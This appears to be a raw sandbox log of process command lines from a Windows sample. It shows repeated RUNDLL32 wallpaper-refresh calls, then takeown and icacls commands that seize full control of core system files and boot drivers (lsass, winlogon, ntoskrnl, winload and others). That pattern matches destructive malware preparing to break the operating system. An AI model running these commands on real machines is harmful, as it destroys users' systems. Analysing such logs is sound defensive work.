"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16458688061760042074-2341047071845534319-10958496752041113015-1457638937920875746"
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5287247158089540-5255966621685800757235953891-7194508511379159619-1481195915"
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20049096051025234728-21387343047721224911131857728-1029093376-718586621-326576182"
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1025118129-40351548620481363539748882051785045091-248190717-30040193-363024293"
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-955187051-539411615-14042259001207550693925546817-1049803682-13763746701915925880"
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10477538151801234206862685643-8902644041290190972-1400448523-1969540054-1758755104"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1380788135-452445478-888798651-128378181517573906669294157851778882532576685743"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "943240922-126595956916461782111933009434-111269411-825314870154178692164020828"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\smss.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\csrss.exe
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\wininit.exe
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\smss.exe /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\wininit.exe /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\csrss.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\lsass.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\lsass.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\services.exe
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winlogon.exe
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winload.exe
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winload.efi
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winlogon.exe /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\ntoskrnl.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\services.exe /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winload.efi /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winload.exe /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\svchost.exe
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\smss.exe
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\csrss.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\wininit.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\svchost.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\LogonUI.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\SysWOW64\wininit.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\lsass.exe
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\services.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\winload.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\winload.efi
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\winlogon.exe
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\ntoskrnl.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\1394bus.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\1394bus.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\1394ohci.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
